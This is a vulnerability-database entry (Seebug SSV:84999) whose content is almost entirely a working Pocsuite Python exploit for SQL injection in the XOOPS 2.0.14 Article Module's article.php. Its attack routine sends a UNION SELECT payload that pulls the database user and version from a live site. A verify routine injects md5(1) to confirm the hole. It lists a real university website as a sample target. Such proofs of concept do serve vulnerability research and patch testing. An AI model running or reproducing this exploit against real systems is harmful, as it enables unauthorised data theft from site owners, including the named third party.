XOOPS 2.0.14 Article Module - 'article.php' SQL Injection Vulnerability

2014-07-01T00:00:00
ID SSV:84999
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '84999'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2008-05-06'
    createDate = '2016-01-08'
    updateDate = '2016-01-08'
    references = ['http://www.sebug.net/vuldb/ssvid-84999']
    name = 'XOOPS 2.0.14 Article Module - 'article.php' SQL Injection Vulnerability'
    appPowerLink = 'http://www.xoops.org'
    appName = 'XOOPS'
    appVersion = '2.0.14'
    vulType = 'SQL Injection'
    desc = '''
        XOOPS 2.0.14的Article Module模块在'article.php'处存在SQL Injection漏洞。
        远程攻击者可以结合Union方式,执行SQL指令,从而获取敏感信息。
    '''
    samples = ['http://rehab.ym.edu.tw/html']

    def _attack(self):
        #利用SQL注入读取数据库信息
        result = {}
        #访问的地址
        exploit='/modules/articles/article.php?id='
        #利用Union方式读取数据库信息
        payload="-3/**/UNION/**/SELECT/**/1,2,3,4,concat(0x247e7e7e24,user(),"\
        "0x2a2a2a,version(),0x247e7e7e24),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+"
        #构造漏洞利用连接
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #提取信息的正则表达式
        parttern='\$~~~\$\<a href=.*\>(.*)\*\*\*(.*)\$~~~\$\<\/a\>'
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查返回结果
        if resp.status_code==200:
            #提取信息
            match=re.search(parttern,resp.content,re.M|re.I)
            if match:
                #漏洞利用成功
                result['DatabaseInfo']={}
                #数据库用户名
                result['DatabaseInfo']['Username']=match.group(1)
                #数据库版本
                result['DatabaseInfo']['Version']=match.group(2)
        return self.parse_output(result)

    def _verify(self):
        #利用注入漏洞计算md5(1)
        result = {}
        #利用的payload
        payload='-3/**/UNION/**/SELECT/**/1,2,3,4,md5(1),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+'
        #漏洞页面
        exploit='/modules/articles/article.php?id='
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #构造访问连接地址
        vulurl=self.url+exploit+payload
        #访问连接
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查是否含有特征字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
        if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
            #漏洞验证成功
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] = self.url+exploit
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)